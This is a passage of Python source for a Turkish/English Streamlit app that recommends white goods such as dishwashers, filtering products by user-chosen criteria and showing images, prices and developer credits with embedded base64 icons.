str(fp1.price[0]) ) elif len(fp3.puan) > 2: col1, col2 = st.columns([1,1]) im1 = 
Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp1.image[0], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp3.full_name[1] ) st.markdown("Fiyat : " + str(fp3.price[1]) ) elif machine =="Bulaşık Makinesi": capacity_options = [' ','Düşük Kapasite','Orta Kapasite', 'Yüksek Kapasite'] capacity_help = '''Düşük kapasite: 12 Kişilik ve Altı , Orta Kapasite: 13 Kişilik, Yüksek Kapasite: 14 Kişilik ve Üstü'''.strip() capacity = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin kapasitesi ne kadar olmalı?',options=capacity_options,help=capacity_help) type_options = [' ',"Solo","Ankastre"] type_help = '''Kullanım Tipi'''.strip(",") type_ = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin kullanım tipi nasıl olmalı?',options=type_options,help=type_help) size_options = [' ',"Küçük boyut","Standart Boyut","Standard üstü"] size = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin büyüklüğü ne kadar olmalı?',options=size_options) energy_usage_options = [' ','Çok önemli', 'Önemli', 'Az önemli', 'Önemsiz'] energy_usage_help = '''Çok Önemli: A+++ A++, Önemli : A+ A, Az Önemli: B C, Önemsiz: D E F G)'''.strip() energy_usage = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin tükettiği enerji miktarı sizin için önemli mi?',options=energy_usage_options,help=energy_usage_help) box_options = [' ',"Sepetli","Çekmeceli"] box_help = '''Çatal Kaşık Bölmesi Tipi'''.strip(",") box = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin çatal kaşık bölmesi nasıl olmalı?',options=box_options,help=box_help) soru_list = [capacity,type_,size,energy_usage,box] soru_list1 = ["capacity","type_","size","energy_usage","box"] soru_list2 = [capacity,type_,size,energy_usage,box] if all([i == " " for i in soru_list2]): st.title('Bakalım sizin için nelerimiz var?') col1, col2, col3, col4, col5 = st.columns([1,1,1,1,1]) data2_b = data2_b[data2_b.image != "YOK"] data3 = data2_b.sample(frac=1).drop_duplicates(['brand']).sample(10).reset_index() im1 = Image.open(requests.get(data3.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(data3.image[1], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(data3.image[2], stream=True).raw).resize((100,150)) im4 = Image.open(requests.get(data3.image[3], stream=True).raw).resize((100,150)) im5 = Image.open(requests.get(data3.image[4], stream=True).raw).resize((100,150)) im6 = Image.open(requests.get(data3.image[5], stream=True).raw).resize((100,150)) im7 = Image.open(requests.get(data3.image[6], stream=True).raw).resize((100,150)) im8 = Image.open(requests.get(data3.image[7], stream=True).raw).resize((100,150)) im9 = Image.open(requests.get(data3.image[8], stream=True).raw).resize((100,150)) im10 = Image.open(requests.get(data3.image[9], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.markdown(data3.brand[0]) b6 = st.image(im6, width=120) st.markdown(data3.brand[5]) with col2: b2 = st.image(im2, width=120) 
st.markdown(data3.brand[1]) b7 = st.image(im7, width=120) st.markdown(data3.brand[6]) with col3: b3 = st.image(im3, width=120) st.markdown(data3.brand[2]) b8 = st.image(im8, width=120) st.markdown(data3.brand[7]) with col4: b4 = st.image(im4, width=120) st.markdown(data3.brand[3]) b9 = st.image(im9, width=120) st.markdown(data3.brand[8]) with col5: b5 = st.image(im5, width=120) st.markdown(data3.brand[4]) b10 = st.image(im10, width=120) st.markdown(data3.brand[9]) elif any([i != " " for i in soru_list2]): for m in soru_list2: if m == " ": pass else: m_index = soru_list2.index(m) len_lst1.append(soru_list1[m_index]) len_lst2.append(m) for k in range(0,len(len_lst2)): dataf_b = dataf_b[dataf_b[len_lst1[k]] == len_lst2[k]] if len(dataf_b) == 0: st.title("Seçilen Kriterlere Uygun Bir Ürün Bulunamadı") elif len(dataf_b) == 1: st.title("Seçilen Kriterlere Uygun Bir Ürün Bulundu") dataf_b = dataf_b.reset_index() im1 = Image.open(requests.get(dataf_b.image[0], stream=True).raw).resize((100,150)) b1 = st.image(im1, width=120) st.title(dataf_b.brand[0]) st.title("Fiyat") st.title(dataf_b.price[0]) elif len(dataf_b) == 2: st.title("Seçilen Kriterlere Uygun İki Ürün Bulundu") col1, col2 = st.columns([1,1]) dataf_b = dataf_b.reset_index() im1 = Image.open(requests.get(dataf_b.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(dataf_b.image[1], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.title(dataf_b.brand[0]) st.title("Fiyat") st.title(dataf_b.price[0]) with col2: b2 = st.image(im2, width=120) st.title(dataf_b.brand[1]) st.title("Fiyat") st.title(dataf_b.price[1]) elif len(dataf_b) == 3: st.title("Seçilen Kriterlere Uygun Üç Ürün Bulundu") col1, col2, col3 = st.columns([1,1,1]) dataf_b = dataf_b.reset_index() im1 = Image.open(requests.get(dataf_b.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(dataf_b.image[1], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(dataf_b.image[2], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.title(dataf_b.brand[0]) st.title("Fiyat") st.title(dataf_b.price[0]) with col2: b2 = st.image(im2, width=120) st.title(dataf_b.brand[1]) st.title("Fiyat") st.title(dataf_b.price[1]) with col3: b3 = st.image(im3, width=120) st.title(dataf_b.brand[2]) st.title("Fiyat") st.title(dataf_b.price[2]) elif len(dataf_b) >3: st.title("Seçilen Kriterlere En Uygun Ürünler") ucuz = dataf_b.sort_values(by="price", ascending=True).reset_index() fp1 = dataf_b[dataf_b["puan"] > dataf_b["puan"].quantile(0.25)].sort_values(by="puan", ascending=False).reset_index() fp1 = fp1.drop(["index"],axis=1) fp2 = fp1[fp1["price"] <dataf_b["price"].quantile(0.75)].sort_values(by="puan", ascending=False).reset_index() fp2 = fp2.drop(["index"],axis=1) fp3 = fp2.sort_values(by="puan", ascending=False).reset_index() fp3 = fp3.drop(["index"],axis=1) if len(fp3.puan) == 2: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp3.image[1], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + 
str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp3.full_name[1] ) st.markdown("Fiyat : " + str(fp3.price[1]) ) elif len(fp3.puan) == 1: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp1.image[0], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp1.full_name[0] ) st.markdown("Fiyat : " + str(fp1.price[0]) ) elif len(fp3.puan) > 2: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp1.image[0], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp3.full_name[1] ) st.markdown("Fiyat : " + str(fp3.price[1]) ) if dil_secenek == "EN": if machine ==" ": col1, col2, col3, col4, col5,col6,col7,col8,col9,col10,col11,col12 = st.columns([1,1,1,1,1,1,1,1,1,1,1,5]) with col12: if dil_secenek == "EN": button = st.button("Like 👍") if button: st.write("Appreciated 💗") file1 = open("counter.txt","r") count = file1.read() count_int = count.replace("'","") count_int = int(count_int) + 1 with open('counter.txt', 'w') as f: f.write(str(count_int)) st.title("About") st.markdown("With <b><i> Customer Recommendation Project</i></b>, we aim to help consumers choose best white goods for them.", unsafe_allow_html=True) st.markdown("People expect the e-commerce websites they engage with to remember who they are and what they’re interested in, and make relevant, individualized, and accurate recommendations for new content and new products based on their previous activities. 
Any app or website that fails to deliver on these demands will quickly see its users flocking out the digital door.") st.markdown("Customer recommendation system is a software tool designed to generate and provide suggestions for items or content a specific user would like to purchase or engage with based on their needs.") st.markdown(" ") st.title("Project Developers") st.markdown(" ") col1, col2, col3, col4, col5,col6,col7 = st.columns([1,1,1,1,1,1,1]) with col1: st.markdown("<b><i>Mert Türkyılmaz</i></b>", unsafe_allow_html=True) st.markdown("[![Foo](data:image/png;base64,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)](https://www.linkedin.com/in/mertturkyilmaz/)") 
st.markdown("[![Foo](data:image/png;base64,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)](https://github.com/mertturkyi
lmaz)") with col4: st.markdown("<b><i>Sarper Yılmaz</i></b>", unsafe_allow_html=True) st.markdown("[![Foo](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAYAAABXAvmHAAAAAXNSR0IArs4c6QAAEWtJREFUaEPVWXl019WV/3zuNyF7AgFCAgmIyhoWBRcCilqhajvWDeiMSyuIOi1dXOrYOq069rTO6bRje7pbDNa6VMClteJSC1XZBBTZt0QgCSQkIRASyPq9nzkvUQ4JUJdO/+g7h3M437zfe+/z7r2fe+/nEf/kg//k58c/FMAtL6xJbW9uuwCmooYYD2ZGNg2u/q62YkNCHB3o0fDwrWe1/T2X+P8O4Kb5y89pS4hKo9hvE5lEoMSEBFFXOxSb+BhMfQnbH8Vtr8eWMDaOsOHRq4p2fRIgnxjArD8szVBbNJNCdoLai9uYcDMN7QRiCec6vJaKKgkNh5AjQwkdo2H6vYAKgBNNOCJgfYP0bF+0RA0JPVJ/d/Wk6o8D5GMDuP9+WdnoFTMVczYjbJE0mFSC3P5q9N6C9SbQKikZxFCSqyANk9sRmL8AcKyEmSR+ASgCsFvA5yH2AfGTedOKHvqHAZg+f36UYfkvgFaDGP1EXUjDk3TUyDBQMdJItIsaCHAbnamghot4DcB7dE6GxSMFWyEoj87+MLWA1mqKF0sBJBLN8frc6UV//ShAPrIFvjB/+YAE41fdcboZPgvgHQjvwpgOVwagLICtoNQB0L3IxfUW4U+SCgG7HK7tZnIXz5C42+jtIPo